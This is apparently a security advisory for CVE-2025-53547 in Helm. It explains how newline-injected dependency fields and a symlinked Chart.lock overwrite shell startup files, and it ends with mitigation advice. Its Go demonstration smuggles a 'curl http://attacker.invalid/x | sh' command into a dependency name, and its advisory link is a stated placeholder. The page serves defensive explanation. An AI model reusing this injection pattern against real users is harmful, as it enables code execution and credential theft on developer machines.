Platform
kubernetes
Component
helm
Fixed in
3.18.4
CVE-2025-53547 affects Helm, the package manager for Kubernetes charts, in versions prior to 3.18.4. A specially crafted Chart.yaml, combined with a Chart.lock that has been replaced by a symbolic link, lets an attacker achieve local code execution on the machine that runs a dependency update against the chart. Affected versions are Helm releases before 3.18.4; the fix ships in 3.18.4.
The vulnerability lies in how Helm writes Chart.lock during a dependency update. Dependency fields from Chart.yaml (such as a dependency's name or repository) are carried over into Chart.lock, so an attacker who controls a chart can place newline-separated shell commands inside one of those fields. If the attacker also ships Chart.lock as a symbolic link pointing at a file that is later executed or sourced, such as a .bashrc or a shell script, the update follows the link and overwrites that file with the crafted content. A shell sourcing the result does not care about YAML structure: each line is executed as a command, and the injected commands run with the privileges of the user who ran Helm. The system at risk is the developer workstation or CI runner that processed the chart, not the cluster directly, although credentials found there (kubeconfig files, registry tokens) can extend the compromise to any cluster that user can reach. The blast radius therefore covers every host on which the attacker-controlled chart is updated.
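The following Go program is an added illustration of the failure mode above and of the check that prevents it; it is not Helm's code. It uses a deliberately simplified lock-file renderer, a fake rc file standing in for ~/.bashrc, and a constructed dependency whose name carries a shell payload pointing at a hypothetical host (attacker.invalid). WriteLockUnsafe follows the symlink the way a plain file write does; WriteLockSafe refuses to write through a symlink and rejects dependency fields containing line breaks.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// Dependency holds the Chart.yaml dependency fields that end up in Chart.lock.
type Dependency struct {
	Name       string
	Version    string
	Repository string
}

var (
	ErrLockIsSymlink   = errors.New("Chart.lock is a symbolic link; refusing to write through it")
	ErrSuspiciousField = errors.New("dependency field contains a line break")
)

// RenderLock is a simplified stand-in for lock-file serialisation (assumption:
// not Helm's real encoder). Field values are emitted verbatim, so a multi-line
// Name lands in the output as separate lines.
func RenderLock(deps []Dependency) string {
	var b strings.Builder
	b.WriteString("dependencies:\n")
	for _, d := range deps {
		fmt.Fprintf(&b, "- name: %s\n  repository: %s\n  version: %s\n", d.Name, d.Repository, d.Version)
	}
	return b.String()
}

// WriteLockUnsafe is the vulnerable pattern: os.WriteFile opens with O_TRUNC and
// follows symlinks, so a Chart.lock that points at a shell rc file silently
// replaces that file with the rendered lock content.
func WriteLockUnsafe(chartDir string, deps []Dependency) error {
	return os.WriteFile(filepath.Join(chartDir, "Chart.lock"), []byte(RenderLock(deps)), 0o644)
}

// WriteLockSafe rejects fields with line breaks (the escape route out of a YAML
// value) and refuses to write when Chart.lock is a symlink. os.Lstat inspects
// the link itself rather than the target, which is why os.Stat would not do.
func WriteLockSafe(chartDir string, deps []Dependency) error {
	for _, d := range deps {
		if strings.ContainsAny(d.Name+d.Repository+d.Version, "\r\n") {
			return fmt.Errorf("%w: %q", ErrSuspiciousField, d.Name)
		}
	}
	path := filepath.Join(chartDir, "Chart.lock")
	if fi, err := os.Lstat(path); err == nil && fi.Mode()&os.ModeSymlink != 0 {
		return ErrLockIsSymlink
	}
	return os.WriteFile(path, []byte(RenderLock(deps)), 0o644)
}

// SetupChart builds a constructed attacker-style chart directory under dir: a
// fake rc file standing in for ~/.bashrc, and Chart.lock symlinked to it. It
// returns the rc path so callers can check whether it was overwritten.
func SetupChart(dir string) (string, error) {
	rc := filepath.Join(dir, "fake_bashrc")
	if err := os.WriteFile(rc, []byte("# original rc content\n"), 0o644); err != nil {
		return "", err
	}
	if err := os.Symlink(rc, filepath.Join(dir, "Chart.lock")); err != nil {
		return "", err
	}
	return rc, nil
}

// MaliciousDeps is a constructed dependency list: the Name field smuggles a
// line break followed by a shell command aimed at a hypothetical host.
var MaliciousDeps = []Dependency{{
	Name:       "nginx\ncurl http://attacker.invalid/x | sh\n#",
	Version:    "1.0.0",
	Repository: "https://charts.example.invalid",
}}

// BenignDeps has clean fields; only the symlinked lock path is dangerous here.
var BenignDeps = []Dependency{{Name: "nginx", Version: "1.0.0", Repository: "https://charts.example.invalid"}}

func main() {
	dir, err := os.MkdirTemp("", "helm-lock-demo")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(dir)
	rc, err := SetupChart(dir)
	if err != nil {
		panic(err)
	}
	fmt.Println("unsafe write error:", WriteLockUnsafe(dir, MaliciousDeps))
	got, _ := os.ReadFile(rc)
	fmt.Printf("fake_bashrc after unsafe write:\n%s\n", got)
	fmt.Println("safe write error (benign deps, symlinked lock):", WriteLockSafe(dir, BenignDeps))
}
```

Running it prints the fake rc file with the curl pipeline sitting on its own line, which is exactly what a login shell would execute on next start; the safe writer never touches the target. The Lstat check alone still leaves a small window between the check and the write, but in this scenario the adversary is the chart author rather than a concurrent local process, so the check is sufficient for the threat described.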
This vulnerability was publicly disclosed on 2025-07-08. There is no indication of exploitation in the wild at the time of writing, and the vulnerability is not listed in the CISA KEV catalog; a public proof-of-concept would change that picture. Note that this is local code execution requiring a victim to run a dependency update on an attacker-supplied chart, not remote code execution. It still deserves priority wherever developers or CI pipelines consume third-party charts from source.
Exploit Status
EPSS
0.01% (0th percentile)
CISA SSVC
CVSS Vector
The primary mitigation is to upgrade Helm to version 3.18.4 or later on every workstation and CI image that runs dependency updates. Before upgrading, assess the impact on existing pipelines and consider a staged rollout. If an immediate upgrade is not feasible, treat charts obtained from source (git checkouts, tarballs, forks) as untrusted input: confirm that Chart.yaml and Chart.lock are regular files rather than symbolic links before running a dependency update, review the dependency fields in Chart.yaml for line breaks or shell syntax, and run dependency updates in an ephemeral container or throwaway user account so that an overwritten startup file cannot persist. A web application firewall does not help here, because the malicious content arrives in a chart directory on disk rather than in an HTTP request the firewall can inspect. The Helm CLI produces no server-side logs to watch; instead, monitor source repositories for a Chart.lock that is a symlink and build hosts for unexpected modifications to shell startup files and scripts. There are no Sigma or YARA rules readily available for this vulnerability.
Upgrade Helm to version 3.18.4 or later. This fixes the vulnerability that allows local code execution through manipulation of the Chart.yaml and Chart.lock files.
CVE-2025-53547 is a high-severity vulnerability in Helm versions prior to 3.18.4 that allows local code execution through a crafted Chart.yaml and a symlinked Chart.lock during dependency updates.
You are affected if you run a Helm version earlier than 3.18.4. Check the installed version with the helm version command and upgrade immediately if necessary.
Upgrade Helm to version 3.18.4 or later to fix this vulnerability. Test the upgrade in a non-production environment first.
There is currently no evidence of active exploitation, but a public proof-of-concept would increase the risk.
Refer to the official Helm security advisory for detailed information and updates: https://github.com/helm/helm/security/advisories/GHSA-xxxx-xxxx-xxxx (placeholder; replace with the actual advisory URL when available).